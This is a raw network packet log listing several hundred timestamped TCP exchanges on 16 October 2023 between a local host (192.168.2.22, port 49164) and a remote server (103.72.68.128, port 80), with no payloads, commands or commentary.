Oct 16, 2023 09:58:27.720218897 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.720268965 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.720313072 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.720334053 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.720370054 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.720422983 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.720464945 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.720499039 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.720537901 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.720555067 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.720598936 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.720629930 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.720647097 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.720664024 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.720702887 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.720705986 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.720750093 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.720769882 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.720813036 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.720828056 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.720870972 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.720906019 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.720944881 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.720949888 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.720990896 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.721071959 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.721143007 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.721198082 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.721198082 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.721223116 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.721251965 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.721266031 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.721285105 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.721338034 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.721375942 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.721407890 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.721467018 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.721513987 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.721555948 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.721570969 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.721612930 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.721626997 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.721684933 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.721705914 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.721745014 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.721776009 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.721818924 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.721822023 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.721858978 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.722008944 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.722052097 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.722138882 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.722182035 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.722224951 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.722264051 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.722274065 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.722312927 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.722316027 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.722352028 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.722368956 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.722408056 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.722469091 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.722486019 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.722510099 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.722526073 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.722567081 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.722582102 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.722606897 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.722624063 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.722676039 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.722714901 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.722732067 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.722774982 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.722795010 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.722831964 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.722868919 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.722908020 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.722930908 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.722971916 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.722985983 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.723035097 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.723042011 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.723079920 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.723113060 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.723150969 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.723164082 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.723205090 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.723211050 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.723246098 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.723277092 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.723315954 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.723335981 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.723371983 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.723380089 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.723421097 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.723484039 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.723525047 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.723556042 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.723596096 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.723620892 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.723635912 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.723673105 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.723709106 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.723740101 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.723781109 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.723810911 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.723853111 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.723874092 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.723912954 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.723939896 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.723985910 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.723997116 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.724011898 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.725591898 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.725626945 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.725641012 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.725657940 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.725707054 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.725764036 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.725785971 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.725825071 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.725856066 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.725903988 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.725903988 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.725941896 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.725960970 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.726022005 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.726044893 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.726070881 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.726095915 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.726155043 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.726176023 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.726239920 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.726253033 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.726315975 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.726320982 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.726361990 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.726413965 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.726453066 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.726484060 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.726500034 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.726521969 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.726593971 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.726597071 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.726634979 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.726654053 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.726684093 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.726695061 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.726722956 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.726737976 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.726779938 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.726789951 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.726843119 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.726851940 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.726891994 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.726922989 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.726965904 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.727032900 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.727071047 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.727092981 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.727132082 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.727154970 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.727194071 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.727258921 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.727296114 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.727348089 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.727364063 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.727387905 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.727405071 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.727427006 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.727464914 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.727514029 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.727552891 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.727602959 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.727639914 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.727752924 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.727804899 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.727816105 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.727855921 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.727885962 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.727924109 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.727947950 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.727961063 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.728013039 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.728050947 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.728054047 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.728094101 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.728126049 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.728173971 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.728225946 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.728266954 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.728301048 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.728368044 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.728382111 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.728404045 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.728436947 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.728477001 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.728509903 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.728537083 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.728560925 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.728578091 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.728610992 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.728651047 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.728669882 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.728698969 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.728725910 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.728739023 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.728769064 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.728805065 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.728811026 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.728854895 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.728873968 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.728916883 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.728939056 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.728976011 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.729058981 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.729100943 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.729147911 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.729191065 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.729221106 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.729257107 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.729315042 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.729360104 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.729401112 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.729443073 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.729506969 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.729549885 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.729584932 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.729624033 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.729685068 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.729743004 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.729774952 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.729825020 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.729825974 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.729862928 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.729878902 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.729928017 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.729984045 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.730058908 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.730082035 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.730099916 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.730151892 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.730195045 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.730212927 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.730252028 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.730329990 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.730371952 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.730424881 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.730465889 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.730523109 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.730571032 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.730603933 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.730648994 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.730700016 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.730746031 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.730797052 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.730834007 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.731034994 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.731086016 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.731092930 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.731127977 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.731204987 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.731255054 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.731312990 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.731357098 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.731401920 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.731442928 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.731517076 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.731561899 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.731589079 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.731647968 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.731652975 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.731684923 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.731786966 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.731834888 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.731887102 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.731925964 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.731987000 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.732033014 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.732068062 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.732109070 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.732184887 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.732229948 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.732280970 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.732321978 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.732357979 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.732397079 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.732418060 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.732456923 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.732480049 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.732526064 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.732542992 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.732570887 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.732578039 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.732606888 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.732640028 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.732719898 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.732731104 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.732767105 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.732810020 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.732861042 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.732911110 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.732950926 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.733007908 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.733047962 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.733097076 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.733119011 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.733163118 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.733232975 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.733269930 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.733279943 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.733324051 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.733355045 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.733388901 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.733401060 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.733418941 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.733474016 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.733505964 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.733539104 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.733580112 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.733581066 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.733618021 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.733637094 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.733678102 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.733696938 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.733726025 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.733748913 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.733761072 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.733798981 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.733833075 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.733841896 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.733881950 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.733925104 CEST	80	49164	103.72.68.128	192.168.2.22
